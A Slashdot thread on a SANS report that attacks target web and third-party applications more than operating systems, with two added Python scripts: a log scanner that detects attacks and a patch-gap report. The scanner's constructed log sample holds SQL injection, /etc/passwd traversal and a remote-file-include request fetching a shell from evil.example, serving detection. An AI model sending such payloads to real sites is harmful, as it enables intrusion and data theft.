SANS Report Says Organizations Focusing On the Wrong Security Threats (98 comments)

yahoi writes "Companies around the world are leaving themselves wide open to Web- and client-side attacks, according to a new report released today by the SANS Institute that includes real attack data gathered from multiple sources. SANS found that most organizations are focusing their patching efforts and vulnerability scanning on the operating system, but they're missing the boat: 60 percent of the total number of attacks occur on Web applications, and many attacks are aimed at third-party applications such as Microsoft Office, and Adobe Flash and other tools. Exacerbating the problem, they're taking twice as long to patch Microsoft Office and other applications than to patch their operating systems."
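
The report's point is that the attacks organizations miss live in the application layer, where an OS-focused patch cycle and vulnerability scan never look. As an added example (not code from the SANS report or from anyone in this thread), the script below runs a small set of web-application attack signatures over web server access logs. The log lines are constructed in Apache combined format, the IPs are documentation addresses, and the three signatures are illustrative, not a complete rule set. Request targets are URL-decoded repeatedly before matching, because double-encoding (`%2527` for `'`) is a common way to slip past a single decode.

```python
"""Flag web-application attack patterns in web server access logs.

Added example, not from the SANS report or the Slashdot thread: the sample
log lines below are constructed, and the signature set is deliberately small.
"""
import re
from urllib.parse import unquote

# Constructed sample in Apache "combined" format; hosts and IPs are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Sep/2009:13:26:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Sep/2009:13:27:44 +0000] "GET /products.php?id=1%27%20OR%201%3D1-- HTTP/1.1" 200 8211 "-" "sqlmap/0.8"
198.51.100.9 - - [15/Sep/2009:13:28:02 +0000] "GET /view.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1910 "-" "curl/7.19"
198.51.100.9 - - [15/Sep/2009:13:28:30 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 3300 "-" "curl/7.19"
203.0.113.5 - - [15/Sep/2009:13:29:11 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [15/Sep/2009:13:30:00 +0000] "GET /search.php?q=%2527%2520UNION%2520SELECT%2520password%2520FROM%2520users HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# (signature name, pattern) pairs applied to the fully decoded request target.
SIGNATURES = [
    ("sqli", re.compile(r"(?i)('\s*or\s+\d+\s*=\s*\d+|union\s+select|--\s*$|;\s*drop\s)")),
    ("traversal", re.compile(r"(\.\./|\.\.\\)")),
    ("rfi", re.compile(r"(?i)[?&][^=]+=(https?|ftp)://")),
]


def decode_target(target, max_rounds=3):
    """URL-decode until the string stops changing (bounded), so that
    double-encoded payloads such as %2527 are seen as the quote they are."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_log(text):
    """Return one finding per request that matches a signature (first match wins)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than guess
        decoded = decode_target(m.group("target"))
        for name, pattern in SIGNATURES:
            if pattern.search(decoded):
                findings.append({
                    "ip": m.group("ip"),
                    "signature": name,
                    "target": decoded,
                    "status": int(m.group("status")),
                })
                break
    return findings


def summarize(findings):
    """Count findings per signature name."""
    counts = {}
    for f in findings:
        counts[f["signature"]] = counts.get(f["signature"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]:<14} {h["signature"]:<10} {h["status"]}  {h["target"]}')
    print(summarize(hits))
```

Note the 200 status codes on the flagged requests: the server answered them normally, which is exactly why an OS-level scan or a patched kernel says nothing about whether the application behind them was vulnerable. On real logs a signature list this short will produce false positives (a legitimate `--` in a parameter, for instance), so treat the output as triage input, not as verdicts.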
  • by petes_PoV ( 912422 ) on Tuesday September 15, 2009 @01:26PM (#29428539)

    SANS found that most organizations are focusing their patching efforts and vulnerability scanning on the operating system, but they're missing the boat

    They make it sound as if it's the fault of the client companies. In fact they probably apply all the security patches they get from their suppliers. If most of them come from the O/S vendors and relatively few come from the application vendors - you can hardly blame their clients.

    Maybe SANS should, instead, be asking why application vendors are so tardy about providing fixes for the vulnerabilities that SANS seem to think are the most exploited? Of course, the answer would be that the baddies focus their efforts on the weakest link, which is why more attacks target the (weak) applications than the better supported operating systems.

  • by Knuckles ( 8964 ) <knuckles@@@dantian...org> on Tuesday September 15, 2009 @01:38PM (#29428721)

    Yeah, and if they were honest and serious that's where they would have said, "third-party applications can be tough. There are very good systems for patching them, like Debian's APT, but sadly most vendors of proprietary software have made practically no progress in this area in two decades".

  • Re:OpenBSD vs Linux (Score:3, Interesting)

    by javaman235 ( 461502 ) on Tuesday September 15, 2009 @02:05PM (#29429021)

    That's a really great post. It reminds me that any OS which grants their users freedom for their apps to do what they like also grants the freedom for some app running on them to do bad things, whether it affects the OS or not. It will always be like that.

    The only solutions I can think of are to 1) create programming languages that result in really secure code through lots of input restraints etc. 2) create a lot of transparency to see what's going on. And even those don't do enough: A language with too much checking will be slow (Java has a much better security name in this department than C for instance) and while seeing if my machine is sending mystery emails out to my friends would be good, what kind of transparency lets me "see" a buffer overflow caused by a Flash movie writing arbitrary code???

  • by compro01 ( 777531 ) on Tuesday September 15, 2009 @02:07PM (#29429039)

    I don't think the problem is lack of application patches being provided, but the lack of them being delivered well.

    The problem as I see it is there is no good method of application patch delivery on Windows (And Mac for that matter). On Linux and BSD, you have package managers built into the distro that handle everything from the repositories (either the distro repositories or the application's repositories). On Windows, there is no such thing (Yes, there are package managers available, but they are not included stock and aren't widely used) and every application has to handle things itself, either by checking on startup or adding yet another background process taking up resources, both of which are decidedly non-optimal solutions.

    In the former, with infrequently used apps (Stuff like Adobe Reader comes to mind), you're going to have infrequent (and thus large) updates, which would result in something like "What? A 15MB update? I don't have time for that, I need to read this PDF." with the obvious consequences or the file being opened before the update option is presented, with the same result.
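
Without a package manager, the practical question for a Windows fleet is "which of the applications on this box are behind a vendor fix, and for how long?" As an added example (not code from the thread or from any vendor tool), the script below answers that from an installed-software inventory and a baseline of minimum fixed versions with their release dates. Both the inventory and the baseline are constructed here; a real inventory would come from the Windows uninstall registry keys or an agent, and the baseline from vendor advisories. The version comparison is the part people get wrong: `9.9` must sort below `9.10`, `2.0` must equal `2.0.0`, and a pre-release tag such as `3.5.3b` must sort below the `3.5.3` release, none of which a plain string comparison gives you.

```python
"""Patch-gap report for third-party applications from an inventory.

Added example, not part of the SANS report or of any comment above. The
inventory, baseline versions and dates are constructed for illustration.
"""
import re
from datetime import date
from statistics import median

# Constructed inventory lines: "<product>\t<installed version>\t<category>".
INVENTORY = """\
Operating system\t5.1.3\tos
OS hotfix rollup\t1.9\tos
Office suite\t12.0.6425\tapp
PDF reader\t9.1.2\tapp
Browser plugin\t10.0.22\tapp
Web browser\t3.5.3\tapp
"""

# Constructed baseline: product -> (minimum fixed version, date the fix shipped).
BASELINE = {
    "Operating system": ("5.1.3", date(2009, 8, 11)),
    "OS hotfix rollup": ("2.0", date(2009, 9, 8)),
    "Office suite": ("12.0.6500", date(2009, 6, 9)),
    "PDF reader": ("9.1.3", date(2009, 7, 14)),
    "Browser plugin": ("10.0.32", date(2009, 7, 30)),
    "Web browser": ("3.5.3", date(2009, 9, 9)),
}

# Fixed "today" so the exposure figures are reproducible.
CHECK_DATE = date(2009, 9, 15)


def parse_version(text):
    """Split a dotted version into comparable fields.

    Each field becomes (number, release_flag, suffix): numbers compare as
    integers (9.9 < 9.10) and a field with a trailing tag (3b) gets
    release_flag 0 so it sorts below the bare release (3)."""
    parts = []
    for field in text.strip().split("."):
        m = re.match(r"(\d*)(.*)$", field)
        num = int(m.group(1)) if m.group(1) else 0
        suffix = m.group(2)
        parts.append((num, 0 if suffix else 1, suffix))
    return tuple(parts)


def version_lt(installed, fixed):
    """True if installed is strictly older than fixed; missing fields count as 0."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    pad = (0, 1, "")
    a += (pad,) * (width - len(a))
    b += (pad,) * (width - len(b))
    return a < b


def parse_inventory(text):
    """Read tab-separated inventory lines into dicts; blank and '#' lines are ignored."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, version, category = line.split("\t")
        records.append({"name": name, "version": version, "category": category})
    return records


def patch_gap(inventory, baseline, check_date):
    """Per category: items checked, items behind the fix, their names, and the
    median number of days the fix has been available but not installed."""
    stats = {}
    exposure = {}
    for rec in inventory:
        fixed_version, released = baseline.get(rec["name"], (None, None))
        if fixed_version is None:
            continue  # nothing in the baseline for this product: no claim made
        cat = stats.setdefault(rec["category"], {"checked": 0, "behind": 0, "behind_names": []})
        cat["checked"] += 1
        if version_lt(rec["version"], fixed_version):
            cat["behind"] += 1
            cat["behind_names"].append(rec["name"])
            exposure.setdefault(rec["category"], []).append((check_date - released).days)
    for category, cat in stats.items():
        days = exposure.get(category, [])
        cat["median_exposure_days"] = median(days) if days else 0
    return stats


if __name__ == "__main__":
    for category, cat in patch_gap(parse_inventory(INVENTORY), BASELINE, CHECK_DATE).items():
        print(f'{category}: {cat["behind"]}/{cat["checked"]} behind, '
              f'median exposure {cat["median_exposure_days"]} days: {cat["behind_names"]}')
```

On the constructed data the OS side is one patch behind by a week while the application side is three patches behind with a median exposure of two months, which is the shape of the gap the report describes. The useful operational output is the `behind_names` list per host, since that is what a package manager would have handled for you.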

  • Re:Too confusing (Score:2, Interesting)

    by slinches ( 1540051 ) on Tuesday September 15, 2009 @02:33PM (#29429357)

    This would have been so much easier to understand with a proper /. car analogy.

    Here you go:

    It's like locking your car doors and keeping up with the manufacturer recall notices, but ignoring that the remote start system you had installed uses an unencrypted signal.

  • by HangingChad ( 677530 ) on Tuesday September 15, 2009 @02:52PM (#29429613) Homepage

    Business Computers == WindowsXP

    I guess we're one of the approximations. ;) Our office is more Ubuntu than Windows and people, astonishing to the Windows faithful, don't have any trouble getting their work done.

    Almost any office could replace many, if not most, of their desktops with Ubuntu with very little difficulty. The level of effort increases to another level if you want to try replacing all of them.

    Imagine having APT for a large percentage of your desktops. A couple keystrokes to run a script and they're all up to date. Sweet.

  • Re:OpenBSD vs Linux (Score:3, Interesting)

    by jafiwam ( 310805 ) on Tuesday September 15, 2009 @02:53PM (#29429617) Homepage Journal

    The security model of PHP in Windows is still pretty bad.

    The default install of PHP can let a user put files in a web site that can compromise or infect the operating system.

    Plus, a lot of third party add-ons for PHP want you to add "read/execute" to CMD.exe and put it in the PATH to the PHP services to piggy back their apps into working. Which is, well, stupid.

    Maybe on Linux PHP is no harm to the OS, but on MS boxes that is not a safe assumption to make.

  • by Artifakt ( 700173 ) on Tuesday September 15, 2009 @03:34PM (#29430085)

    The claim that there is no good system is just the sort of claim that gets quoted out of context, and when it happens, supposedly expert technical people will be the ones making the mistakes.

    Think of it like politics. Someone writes a story specifically about the Democratic party in Ohio. Five paragraphs in, they say "There are no particularly distinguished front runners for the upcoming election.". What happens when that gets quoted by itself - is there much chance at all that someone will put (for the 2012 Ohio governor's race) after the quote? It seems far more likely that someone will claim the original author said there were no distinguished candidates for the whole Democratic party this time around, or misapply it to the presidential election, or maybe someone with different biases will apply it to both major parties nationwide.

    Authors, when they are trying to be fact-focused, fair, and rational, frequently go over their manuscripts looking for likely quotes that won't look right if quoted out of context, and insert internal context (In this case it would be something such as 'there's no good system in Windows for patching them'). It's often a mistake to rely on context from outside the immediate quote to keep things clear.

    Editors often take these modifications back out for brevity, but I've known several professional editors who had to deal with the results (i.e. a libel suit over something that wasn't libelous in full context) and have started encouraging such additional context instead.

    So you're right - the problem hasn't been solved for Microsoft products. And the parent poster is right - the article is easy to misquote, and that hurts its overall credibility.

  • by dkf ( 304284 ) <donal.k.fellows@manchester.ac.uk> on Tuesday September 15, 2009 @04:54PM (#29431109) Homepage

    Plus, you eventually end up with a system where all applications have to be approved by the BOFH. Then, when a developer/techie who knows what he's doing needs to use a new tool to solve a problem it ends up in a 6-month queue for "approval".

    What actually happens is that the user complains to Heap Big Boss (board-level or equivalent) and they instruct the poor BOFH to approve their pet project immediately or find another job. It's a really bad idea to be the person who says "no" to another person doing their job, especially if they have the ear of higher up (and most users will only deliberately use a new app if it is something dictated from on high; the rest of the time they'll cling to old stuff far more than a BOFH would).

  • Re:OpenBSD vs Linux (Score:2, Interesting)

    by bloodhawk ( 813939 ) on Tuesday September 15, 2009 @09:53PM (#29434923)

    As a hacker, I am going to walk into your PHP cubicle and snarf up all your customer data to sell for identity fraud. But don't worry, you can tell all your customers your OS was safe and the hacker was not able to break out of the sandbox to get access to your other apps. I am sure they will feel so much better about having their details sold on the black market hearing that wonderful news.
